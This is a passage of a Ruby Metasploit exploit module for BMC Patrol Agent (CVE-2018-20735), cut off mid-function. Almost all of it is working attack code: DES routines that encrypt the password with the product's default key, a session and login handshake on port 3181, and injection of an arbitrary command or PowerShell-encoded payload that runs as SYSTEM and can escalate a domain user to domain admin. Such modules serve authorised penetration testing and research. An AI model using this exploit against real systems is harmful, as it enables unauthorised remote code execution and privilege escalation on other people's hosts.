0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004,
0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0,
0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004,
0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004,
0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004,
0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004,
0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000,
0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0,
0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400,
0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000,
0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400,
0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0,
0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400,
0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000,
0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000,
0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001,
0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001,
0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001,
0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001,
0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000,
0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000,
0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002,
0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000,
0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002,
0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000,
0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002,
0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110,
0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000,
0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000,
0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110,
0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000,
0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000,
0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110,
0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110,
0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000,
0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0,
0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008,
0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000,
0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000,
0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000,
0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000,
0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000,
0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000,
0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110,
0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000,
0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110,
0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110,
0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110,
0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110,
0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000,
0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000,
0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000,
0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000,
0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000,
0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008,
0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800,
0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000,
0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800,
0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801,
0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1,
0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800,
0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400,
0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400,
0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400,
0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000,
0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400,
0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400,
0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000,
0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000,
0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220,
0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220,
0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220,
0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220,
0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220,
0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220,
0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000,
0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220,
0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000,
0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0,
0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220
].freeze
PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\
"\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\
"\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\
"\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze
PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\
"\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\
"\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\
"\x23\x1C\x1F".freeze
SBOX_BYTE_ORDER = [
1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000,
0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000,
0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000,
0x40000000, 0x80000000
].freeze
ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze
INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze
INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze
DES_ENCRYPT = 0
def initialize(info = {})
super(update_info(info,
'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution',
'Description' => %q(
This module leverages the remote command execution feature provided by
the BMC Patrol Agent software. It can also be used to escalate privileges
on Windows hosts as the software runs as SYSTEM but only verfies that the password
of the provided user is correct. This also means if the software is running on a
domain controller, it can be used to escalate from a normal domain user to domain
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
powershell to execute the payload. The powershell version tends to timeout on
the first run so it may take multiple tries.
),
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd' # @rwincey / Vulnerability Discovery and MSF module author
],
'References' =>
[
['CVE', '2018-20735'],
['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
],
'Platform' => ['win', 'linux'],
'Targets' =>
[
[
'Windows Powershell Injected Shellcode', {
'Platform' => 'win'
}
],
[
'Generic Command Callback', {
'Arch' => ARCH_CMD,
'Platform' => %w[linux unix win]
}
]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DefaultOptions' => {
'DisablePayloadHandler' => true
},
'DisclosureDate' => 'Jan 17 2019'))
register_options(
[
Opt::RPORT(3181),
OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']),
OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']),
OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
]
)
end
def cleanup
disconnect
print_status("Disconnected from BMC Patrol Agent.")
@inflater.close
@deflater.close
super
end
def get_target_os(srv_info_msg)
lines = srv_info_msg.split("\n")
fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}"
os = nil
ver = nil
lines[2..-2].each do |i|
val = i.split("=")
if val.length == 2
if val[0].strip! == "T"
os = val[1]
elsif val[0].strip! == "VER"
ver = val[1]
end
end
end
[os, ver]
end
def get_cmd_output(cmd_output_msg)
lines = cmd_output_msg.split("\n")
fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
# Parse out command results
idx_start = cmd_output_msg.index("Result\x00")
idx_end = cmd_output_msg.index("RemPsl_user")
output = cmd_output_msg[idx_start + 7..idx_end - 1]
output
end
def exploit
# Manually start the handler if not running a single command
if datastore['CMD'].nil? || datastore['CMD'].empty?
# Set to nil if the cmd is empty for checks further down
datastore['CMD'] = nil
datastore['DisablePayloadHandler'] = false
# Configure the payload handler
payload_instance.exploit_config = {
'active_timeout' => 300
}
# Setup the payload handler
payload_instance.setup_handler
# Start the payload handler
payload_instance.start_handler
end
# Initialize zlib objects
@deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
@inflater = Zlib::Inflate.new
# Connect to the BMC Patrol Agent
connect
print_status("Connected to BMC Patrol Agent.")
# Create session msg
create_session
ret_data = receive_msg
fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil?
# Authenticate
authenticate_user(datastore['USER'], datastore['PASSWORD'])
# Receive the authentication response
ret_data = receive_msg
fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil?
ret_msg = process_response(ret_data)
if ret_msg =~ /logged in/
print_status("Successfully authenticated user.")
else
fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
end
# Receive the server info
ret_data = receive_msg
fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil?
srv_info = process_response(ret_data)
# Get the target's OS from their info msg
target_os = get_target_os(srv_info)
# When using autotargeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil?
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
target_name = target.name
if !datastore['CMD'].nil?
command = datastore['CMD'].tr('"', '\"')
print_status("Command to execute: #{command}")
elsif target_name == 'Windows Powershell Injected Shellcode'
# Get encoded powershell of payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
else
command = payload.raw.tr('"', '\"')
end
# Run command
run_cmd(command)
# Receive command confirmation
ret_data = receive_msg
if !ret_data.nil?
process_response(ret_data)
end
# Receive command output
ret_data = receive_msg
if !ret_data.nil? && !datastore['CMD'].nil?
cmd_result_data = process_response(ret_data)
cmd_result = get_cmd_output(cmd_result_data)
print_status("Output:\n#{cmd_result}")
end
# Handle the shell
handler
end
def receive_msg
header = sock.get_once(6)
if header.nil?
return
end
payload_size_arr = header[0, 4]
payload_size = payload_size_arr.unpack1("N")
payload = ''
if payload_size > 0
payload = sock.get_once(payload_size)
if payload.nil?
return
end
end
return header + payload
end
def send_msg(type, compression, data)
data_len = data.length
buf = [data_len].pack('N')
# Set the type
buf += [type].pack('C')
# Set compression flag
buf += [compression].pack('C')
# Add data
buf += data
# Send msg
sock.put(buf)
end
def process_response(ret_data)
# While style checks complain, I intend to leave this parsing
# in place for debugging purposes
ret_size_arr = ret_data[0, 4]
ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment
msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment
comp_flag = ret_data[5, 1]
payload_data = ret_data[6..-1]
if comp_flag == "\x00"
bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment
payload_data = @inflater.inflate(payload_data)
end
return payload_data
end
def run_cmd(cmd)
user_num = rand 1000..9999
msg_1 = %(R_E
{
\tRE_ID=1
\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num}
\tRE_ORG=PemApi
\tRE_SEV=1
\tRE_NSEV=5
\tRE_ST=
}
)
msg_1 += "\x00"
# Compress the message
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
send_msg(0x44, 0x0, comp_data)
end
def identify(user)
inner_len = 15
msg_type = 8
len_str = [inner_len].pack("N")
msg_str = [msg_type].pack("N")
msg_1 = %(PEM_MSG
{
\tNSDL=#{inner_len}
\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00
}
)
msg_1 += "\x00"
print_status("Msg: #{msg_1}")
bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment
# Compress the message
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
send_msg(0x44, 0x0, comp_data)
end
def create_session
sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00"
sess_msg += "\x00" * 0x68
send_msg(0x45, 0x2, sess_msg)
end
def authenticate_user(user, password)
# Default encryption key
enc_key = 'k$C4}@"_'
output_data = des_crypt_func(password, enc_key, DES_ENCRYPT)
# Convert to hex string
encrpted_pw = output_data.unpack1("H*")
des_pw = encrpted_pw.upcase
msg_1 = %(ID
{
\tHOST=user
\tUSER=#{user}
\tPASS=#{des_pw}
\tVER=V9.6.00
\tT=PEMAPI
\tHTBT=1
\tTMOT=1728000
\tRTRS=3
}
)
msg_1 += "\x00"
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
send_msg(0x44, 0x0, comp_data)
end
def rotate_block_init(input_block_tuple)
v6 = 0
v5 = 0
input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
v3 = input_block_tuple[0]
v4 = input_block_tuple[1]
if (v4 & 0x2000000) != 0
v5 = 1
end
if (v4 & 0x20000) != 0
v5 |= 2
end
if (v4 & 0x200) != 0
v5 |= 4
end
if (v4 & 2) != 0
v5 |= 8
end
if (v3 & 0x2000000) != 0
v5 |= 0x10
end
if (v3 & 0x20000) != 0
v5 |= 0x20
end
if (v3 & 0x200) != 0
v5 |= 0x40
end
if (v3 & 2) != 0
v5 |= 0x80
end
if (v4 & 0x8000000) != 0
v5 |= 0x100
end
if (v4 & 0x80000) != 0
v5 |= 0x200
end
if (v4 & 0x800) != 0
v5 |= 0x400
end
if (v4 & 8) != 0
v5 |= 0x800
end
if (v3 & 0x8000000) != 0
v5 |= 0x1000
end
if (v3 & 0x80000) != 0
v5 |= 0x2000
end
if (v3 & 0x800) != 0
v5 |= 0x4000
end
if (v3 & 8) != 0
v5 |= 0x8000
end
if (v4 & 0x20000000) != 0
v5 |= 0x10000
end
if (v4 & 0x200000) != 0
v5 |= 0x20000
end
if (v4 & 0x2000) != 0
v5 |= 0x40000
end
if (v4 & 0x20) != 0
v5 |= 0x80000
end
if (v3 & 0x20000000) != 0
v5 |= 0x100000
end
if (v3 & 0x200000) != 0
v5 |= 0x200000
end
if (v3 & 0x2000) != 0
v5 |= 0x400000
end
if (v3 & 0x20) != 0
v5 |= 0x800000
end
if (v4 < 0)
v5 |= 0x1000000
end
if (v4 & 0x800000) != 0
v5 |= 0x2000000
end
if (v4 & 0x8000) != 0
v5 |= 0x4000000
end
if (v4 & 0x80) != 0
v5 |= 0x8000000
end
if (v3 < 0)
v5 |= 0x10000000
end
if (v3 & 0x800000) != 0
v5 |= 0x20000000
end
if (v3 & 0x8000) != 0
v5 |= 0x40000000
end
if (v3 & 0x80) != 0
v5 |= 0x80000000
end
if (v4 & 0x1000000) != 0
v6 = 1
end
if (v4 & 0x10000) != 0
v6 |= 2
end
if (v4 & 0x100) != 0
v6 |= 4
end
if (v4 & 1) != 0
v6 |= 8
end
if (v3 & 0x1000000) != 0
v6 |= 0x10
end
if (v3 & 0x10000) != 0
v6 |= 0x20
end
if (v3 & 0x100) != 0
v6 |= 0x40
end
if (v3 & 1) != 0
v6 |= 0x80
end
if (v4 & 0x4000000) != 0
v6 |= 0x100
end
if (v4 & 0x40000) != 0
v6 |= 0x200
end
if (v4 & 0x400) != 0
v6 |= 0x400
end
if (v4 & 4) != 0
v6 |= 0x800
end
if (v3 & 0x4000000) != 0
v6 |= 0x1000
end
if (v3 & 0x40000) != 0
v6 |= 0x2000
end
if (v3 & 0x400) != 0
v6 |= 0x4000
end
if (v3 & 4) != 0
v6 |= 0x8000
end
if (v4 & 0x10000000) != 0
v6 |= 0x10000
end
if (v4 & 0x100000) != 0
v6 |= 0x20000
end
if (v4 & 0x1000) != 0
v6 |= 0x40000
end
if (v4 & 0x10) != 0
v6 |= 0x80000
end
if (v3 & 0x10000000) != 0
v6 |= 0x100000
end
if (v3 & 0x100000) != 0
v6 |= 0x200000
end
if (v3 & 0x1000) != 0
v6 |= 0x400000
end
if (v3 & 0x10) != 0
v6 |= 0x800000
end
if (v4 & 0x40000000) != 0
v6 |= 0x1000000
end
if (v4 & 0x400000) != 0
v6 |= 0x2000000
end
if (v4 & 0x4000) != 0
v6 |= 0x4000000
end
if (v4 & 0x40) != 0
v6 |= 0x8000000
end
if (v3 & 0x40000000) != 0
v6 |= 0x10000000
end
if (v3 & 0x400000) != 0
v6 |= 0x20000000
end
if (v3 & 0x4000) != 0
v6 |= 0x40000000
end
if (v3 & 0x40) != 0
v6 |= 0x80000000
end
# Create return tuple
ret_block = Array.new
ret_block.push v5
ret_block.push v6
ret_block
end
def rotate_block_final(input_block_tuple)
v6 = 0
v5 = 0
input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
v3 = input_block_tuple[0]
v4 = input_block_tuple[1]
if (v4 & 0x80) != 0
v5 = 1
end
if (v3 & 0x80) != 0
v5 |= 2
end
if (v4 & 0x8000) != 0
v5 |= 4
end
if (v3 & 0x8000) != 0
v5 |= 8
end
if (v4 & 0x800000) != 0
v5 |= 0x10
end
if (v3 & 0x800000) != 0
v5 |= 0x20
end
if (v4 < 0)
v5 |= 0x40
end
if (v3 < 0)
v5 |= 0x80
end
if (v4 & 0x40) != 0
v5 |= 0x100
end
if (v3 & 0x40) != 0
v5 |= 0x200
end
if (v4 & 0x4000) != 0
v5 |= 0x400
end
if (v3 & 0x4000) != 0
v5 |= 0x800
end
if (v4 & 0x400000) != 0
v5 |= 0x1000
end
if (v3 & 0x400000) != 0
v5 |= 0x2000
end
if (v4 & 0x40000000) != 0
v5 |= 0x4000
end
if (v3 & 0x40000000) != 0
v5 |= 0x8000
end
if (v4 & 0x20) != 0
v5 |= 0x10000
end
if (v3 & 0x20) != 0
v5 |= 0x20000
end
if (v4 & 0x2000) != 0
v5 |= 0x40000
end
if (v3 & 0x2000) != 0
v5 |= 0x80000
end
if (v4 & 0x200000) != 0
v5 |= 0x100000
end
if (v3 & 0x200000) != 0
v5 |= 0x200000
end
if (v4 & 0x20000000) != 0
v5 |= 0x400000
end
if (v3 & 0x20000000) != 0
v5 |= 0x800000
end
if (v4 & 0x10) != 0
v5 |= 0x1000000
end
if (v3 & 0x10) != 0
v5 |= 0x2000000
end
if (v4 & 0x1000) != 0
v5 |= 0x4000000
end
if (v3 & 0x1000) != 0
v5 |= 0x8000000
end
if (v4 & 0x100000) != 0
v5 |= 0x10000000
end
if (v3 & 0x100000) != 0
v5 |= 0x20000000
end
if (v4 & 0x10000000) != 0
v5 |= 0x40000000
end
if (v3 & 0x10000000) != 0
v5 |= 0x80000000
end
if (v4 & 8) != 0
v6 = 1
end
if (v3 & 8) != 0
v6 |= 2
end
if (v4 & 0x800) != 0
v6 |= 4
end
if (v3 & 0x800) != 0
v6 |= 8
end
if (v4 & 0x80000) != 0
v6 |= 0x10
end
if (v3 & 0x80000) != 0
v6 |= 0x20
end
if (v4 & 0x8000000) != 0
v6 |= 0x40
end
if (v3 & 0x8000000) != 0
v6 |= 0x80
end
if (v4 & 4) != 0
v6 |= 0x100
end
if (v3 & 4) != 0
v6 |= 0x200
end
if (v4 & 0x400) != 0
v6 |= 0x400
end
if (v3 & 0x400) != 0
v6 |= 0x800
end
if (v4 & 0x40000) != 0
v6 |= 0x1000
end
if (v3 & 0x40000) != 0
v6 |= 0x2000
end
if (v4 & 0x4000000) != 0
v6 |= 0x4000
end
if (v3 & 0x4000000) != 0
v6 |= 0x8000
end
if (v4 & 2) != 0
v6 |= 0x10000
end
if (v3 & 2) != 0
v6 |= 0x20000
end
if (v4 & 0x200) != 0
v6 |= 0x40000
end
if (v3 & 0x200) != 0
v6 |= 0x80000
end
if (v4 & 0x20000) != 0
v6 |= 0x100000
end
if (v3 & 0x20000) != 0
v6 |= 0x200000
end
if (v4 & 0x2000000) != 0
v6 |= 0x400000
end
if (v3 & 0x2000000) != 0
v6 |= 0x800000
end
if (v4 & 1) != 0
v6 |= 0x1000000
end
if (v3 & 1) != 0
v6 |= 0x2000000
end
if (v4 & 0x100) != 0
v6 |= 0x4000000
end
if (v3 & 0x100) != 0
v6 |= 0x8000000
end
if (v4 & 0x10000) != 0
v6 |= 0x10000000
end
if (v3 & 0x10000) != 0
v6 |= 0x20000000
end
if (v4 & 0x1000000) != 0
v6 |= 0x40000000
end
if (v3 & 0x1000000) != 0
v6 |= 0x80000000
end
# Create return tuple
ret_block = Array.new
ret_block.push v5
ret_block.push v6
ret_block
end
def load(a1)
a2 = Array.new(8, 0)
v3 = a1
a2[0] = a1 & 0xff
v3 >>= 3
a2[1] = v3 & 0xff
v3 >>= 4
a2[2] = v3 & 0xff
v3 >>= 4
a2[3] = v3 & 0xff
v3 >>= 4
a2[4] = v3 & 0xff
v3 >>= 4
a2[5] = v3 & 0xff
v3 >>= 4
a2[6] = v3 & 0xff
v3 >>= 4
a2[7] = v3 & 0xff
a2[0] = (a2[0] * 2) & 0xff
a2[7] |= (16 * a2[0]) & 0xff
v3 >>= 4
a2[0] |= v3 & 0xff
data_block = a2.pack("c*").unpack("V*")
data_block[0] &= 0x3F3F3F3F
data_block[1] &= 0x3F3F3F3F
data_block
end
def desx(data_block, ksch, idx)
ksch = ksch.pack("V*")
ksch = ksch.unpack("Q<*")
key_block = ksch[idx]
data_block_ptr = data_block.pack("V*")
data_block_ptr = data_block_ptr.unpack1("Q<*")
data_block_ptr ^= key_block
counter = 1
data_block_byte_ptr = [data_block_ptr].pack('Q<')
left = SBOXES[data_block_byte_ptr[0].ord]
right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
counter += 1
left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
counter += 1
right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
# Create return tuple
ret_block = Array.new
ret_block.push left
ret_block.push right
ret_block
end
def store(data_block)
a1 = data_block.pack("V*")
val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1
val & 0xffffffff
end
def sbox_xors(data_block_in, ksch_arg, decrypt_flag)
decrypt_flag_cpy = decrypt_flag
if (decrypt_flag & 0x100) != 0
data_block_0 = data_block_in
else
data_block_0 = rotate_block_init(data_block_in)
end
encrypt_flag = (decrypt_flag_cpy & 1) == 0
ti_block_0 = load(data_block_0[0])
ti_block_1 = load(data_block_0[1])
for i in 0..15
ti_cpy = ti_block_1
if encrypt_flag
ti_block_1 = desx(ti_block_1, ksch_arg, i)
else
